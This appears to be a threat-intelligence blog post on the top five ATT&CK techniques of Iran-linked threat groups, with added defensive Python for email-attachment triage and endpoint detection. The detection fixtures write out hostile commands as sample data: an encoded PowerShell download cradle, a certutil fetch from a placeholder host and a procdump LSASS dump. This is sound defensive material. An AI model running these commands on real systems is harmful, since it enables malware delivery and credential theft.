TOP 5 ATT&CK techniques used by Threat Actors tied to Iran
On the 3rd of January 2020, the Iranian Major General Qasem Soleimani was killed in a US drone strike ordered by President Donald Trump at Baghdad International Airport. Since then, popular demonstrations and military responses have been seen coming from Iran. It’s important to remember, however, that wars and military actions nowadays can also be carried out in cyberspace, though such responses are not always easy to spot. False flags and strong anonymity measures can be used to make attribution of cyberattacks increasingly difficult.
Hacktivist activities such as defacements, social network account takeovers or DDoS attacks are common in these situations. High-impact cyberattacks targeting critical infrastructure or otherwise causing chaos might be too obvious and too easily attributable to Iran even without evidence, so attacks of that kind are unlikely at this moment. However, more sophisticated intelligence and strategic operations targeting key US government assets, people and organizations, in order to spy and gain insights into the US’s next moves, are more likely. Such operations would also be more difficult to spot and attribute to Iran.
There are several advanced threat actor groups potentially tied to the Iranian government which have been performing operations in the past few years, like APT33, OilRig / APT34, APT39, Leafminer and MuddyWater, among others. We track their activities thanks to our Threat Context module.
After researching these and other groups with potential links to Iran, we have complemented the tactics, techniques and procedures (TTPs) outlined in the MITRE ATT&CK framework with insights from our own investigations, resulting in a list of the TOP 5 techniques used by these groups. These are not the only techniques used by these attackers, but they are the most frequently employed.
- T1193 – Spearphishing Attachment: Spearphishing is one of the most popular techniques used by advanced actors to gain Initial Access. In this case, groups like APT39, DarkHydrus and OilRig / APT34 have used the technique, relying on social engineering and attaching mostly Office and PDF documents to their malicious emails. This technique is usually tied to T1204 – User Execution, because the victim needs to open the malicious document. Some groups tied to Iran have also made use of T1189 – Drive-by Compromise, which needs no action from the user other than visiting a specific website.
  - Protection:
    - Automatic e-mail analysis to detect and stop malicious attachments
    - Threat Intelligence services and feeds to support detection activities
    - Employee education and awareness
- T1086 – PowerShell: This is another technique widely used by all kinds of cybercriminals and malware nowadays. PowerShell is present by default in modern Windows installations, so attackers make use of it to perform specific actions like downloading and installing malware or changing system configuration. Actors like CopyKittens use PowerShell Empire, which gives them easy, full control of the infected machines.
  - Protection:
    - Consider uninstalling PowerShell from systems if possible
    - Implement proper security policies to block certain PowerShell actions
- T1078 – Valid Accounts: As we detail in our report about The Credential Theft Ecosystem, a single compromised valid account can be the door that leads to the full compromise of an organization. Threat actors tied to Iran such as APT33, APT39 or OilRig / APT34 have used valid accounts for Initial Access, Privilege Escalation and Lateral Movement.
  - Protection:
    - Good password policies that force frequent password changes and disallow password reuse could be a way to mitigate this risk
    - Threat Intelligence services to detect credential leaks/theft and to support the detection of malware infections which could steal credentials
    - Employee education and awareness
- T1003 – Credential Dumping: Once threat actors have access to compromised systems, a common behavior is to try to obtain every credential they can from those machines in order to move laterally or regain access to the systems easily. Attackers originating from Iran have used tools like mimikatz or ProcDump to accomplish this task.
  - Protection:
    - Detecting the tools used to perform this technique can help prevent the dumping of credentials
    - Minimize the number of credentials stored in plain text (or in easily decrypted/decoded formats) in RAM, the registry or the file system
- T1105 – Remote File Copy: This is probably one of the techniques most widely used in advanced attacker intrusions. It is quite common to see threat actors copying tools and additional malware from servers they control onto the victims’ systems in order to support lateral movement. Iranian attackers are no exception, and they also use this technique in their activities.
  - Protection:
    - Network traffic analysis to detect anomalies in incoming and outgoing traffic
    - Threat Intelligence services and feeds to support the detection of network activity towards those malicious servers
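As an added example of the "automatic e-mail analysis" protection listed under T1193 (this is illustrative code, not part of the original post or of any product mentioned here), the following Python script builds a constructed spearphishing-style message with three attachments and triages them the way a mail gateway rule set would: risky extensions, double extensions, and a mismatch between the declared type and the file's magic bytes. The sender, recipient, filenames and attachment bytes are all constructed sample data.

```python
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Attachment types a gateway should quarantine or detonate before delivery
# (assumed policy list for this example).
RISKY_EXTENSIONS = {".docm", ".xlsm", ".pptm", ".js", ".vbs", ".hta",
                    ".exe", ".scr", ".lnk", ".iso"}
# Magic bytes used to check that a payload is what its name claims to be.
MAGIC = {"pdf": b"%PDF", "zip": b"PK\x03\x04", "pe": b"MZ"}


def build_sample_message():
    """Constructed sample mail: one macro-enabled document, one executable
    disguised as a PDF, and one genuine PDF for comparison."""
    msg = EmailMessage()
    msg["From"] = "hr@example.invalid"
    msg["To"] = "analyst@example.invalid"
    msg["Subject"] = "Updated travel policy (please review)"
    msg.set_content("Please open the attached policy and confirm receipt.")
    # Macro-enabled Word document: an OOXML container, i.e. zip magic bytes
    msg.add_attachment(MAGIC["zip"] + b"\x00" * 32, maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12",
                       filename="policy.docm")
    # Declared as PDF, double extension, but carries a PE header
    msg.add_attachment(MAGIC["pe"] + b"\x90\x00" + b"\x00" * 32,
                       maintype="application", subtype="pdf",
                       filename="invoice.pdf.exe")
    # A genuine (truncated) PDF
    msg.add_attachment(b"%PDF-1.4\n%constructed sample\n",
                       maintype="application", subtype="pdf",
                       filename="agenda.pdf")
    return msg.as_bytes()


def triage_attachments(raw):
    """Parse a raw RFC 5322 message and return (filename, reasons) per
    attachment; an empty reasons list means nothing suspicious was found."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""
        ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
        reasons = []
        if ext in RISKY_EXTENSIONS:
            reasons.append(f"risky extension {ext}")
        if name.count(".") > 1:
            # Heuristic: "report.pdf.exe" style names; tune for your mail flow
            reasons.append("double extension")
        if ext == ".pdf" and not data.startswith(MAGIC["pdf"]):
            reasons.append("declared PDF but content is not PDF")
        if data.startswith(MAGIC["pe"]):
            reasons.append("Windows executable header")
        findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in triage_attachments(build_sample_message()):
        print(f"{name}: {', '.join(reasons) or 'clean'}")
```

The magic-byte check is what catches renamed executables that an extension allowlist alone would miss; a production gateway would add macro inspection of the OOXML container and detonation in a sandbox, which this example leaves out.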
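The detection side of T1086, T1003 and T1105 can be shown in one place. As an added example (not part of the original post or of the Threat Context module), the Python below runs simple detection logic over constructed endpoint telemetry in an assumed, simplified Sysmon-like schema (EventID 1 for process creation, EventID 10 for process access) and maps each hit to one of the techniques above: an encoded PowerShell download cradle spawned by Office, ProcDump pointed at LSASS, an unknown process opening LSASS, and certutil fetching a remote file. The event records, file paths, the `example.invalid` host and the LSASS allowlist are all constructed for illustration.

```python
import base64
import re

# Constructed payload for the sample: a generic download cradle pointing at
# a reserved .invalid host, encoded the way -EncodedCommand expects (UTF-16LE).
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16le")).decode()

# Constructed telemetry (assumed Sysmon-like field names, not a real schema).
SAMPLE_EVENTS = [
    {"EventID": 1,  # Word spawning hidden, encoded PowerShell (T1086)
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_CRADLE}"},
    {"EventID": 1,  # ProcDump aimed at LSASS (T1003)
     "Image": r"C:\Temp\procdump64.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\Temp\l.dmp"},
    {"EventID": 10,  # Unknown binary opening LSASS with full access (T1003)
     "SourceImage": r"C:\Users\Public\svc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1,  # certutil used to pull a file from a remote server (T1105)
     "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/t.exe t.exe"},
    {"EventID": 1,  # Benign: an administrator running a local script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"EventID": 10,  # Benign: antivirus engine touching LSASS is expected
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010"},
]

# Assumed allowlist of processes that legitimately open LSASS on this host.
LSASS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
CRADLE_RE = re.compile(r"(?i)downloadstring|invoke-expression|\biex\b|net\.webclient")
FILE_FETCH_RE = re.compile(r"(?i)downloadfile|invoke-webrequest|-outfile|"
                           r"certutil\S*\s.*-urlcache|bitsadmin\S*\s.*/transfer")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", "ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def detect(events):
    """Return (technique, event index, reason) for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        if ev["EventID"] == 1:
            image = basename(ev["Image"])
            parent = basename(ev.get("ParentImage", ""))
            cmd = ev["CommandLine"]
            # Match on the decoded payload too, so encoding does not hide it
            effective = cmd + " " + decode_encoded_command(cmd)
            if image in ("powershell.exe", "pwsh.exe"):
                if parent in OFFICE_PARENTS:
                    hits.append(("T1086", i, f"PowerShell spawned by {parent}"))
                if ENC_RE.search(cmd) and CRADLE_RE.search(effective):
                    hits.append(("T1086", i, "encoded download cradle"))
            if re.search(r"(?i)lsass", cmd) and (
                    image.startswith("procdump") or "mimikatz" in image
                    or re.search(r"(?i)sekurlsa", cmd)):
                hits.append(("T1003", i, f"{image} targeting LSASS"))
            if FILE_FETCH_RE.search(effective):
                hits.append(("T1105", i, f"{image} fetching a remote file"))
        elif ev["EventID"] == 10 and basename(ev["TargetImage"]) == "lsass.exe":
            source = basename(ev["SourceImage"])
            if source not in LSASS_ALLOWLIST:
                hits.append(("T1003", i,
                             f"{source} opened LSASS with {ev['GrantedAccess']}"))
    return hits


if __name__ == "__main__":
    for technique, idx, reason in detect(SAMPLE_EVENTS):
        print(f"{technique} event#{idx}: {reason}")
```

Two design points carry over to real deployments: decode `-EncodedCommand` before matching, since otherwise the cradle keywords never appear in the raw command line, and maintain the LSASS allowlist from observed baseline data rather than guessing it, because security products, backup agents and some management tools legitimately open that process.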
The use of these techniques is not limited to threat groups dedicated to espionage or to advancing a nation-state’s interests; most are also employed by financially motivated cybercriminals. For this reason, protecting against these TTPs is critical not just for organizations that are more likely to be targeted by nation-states such as Iran, but also for organizations which can be a target for advanced cybercriminal groups such as the Trickbot group, the Dridex groups, Cobalt Gang and similar actors.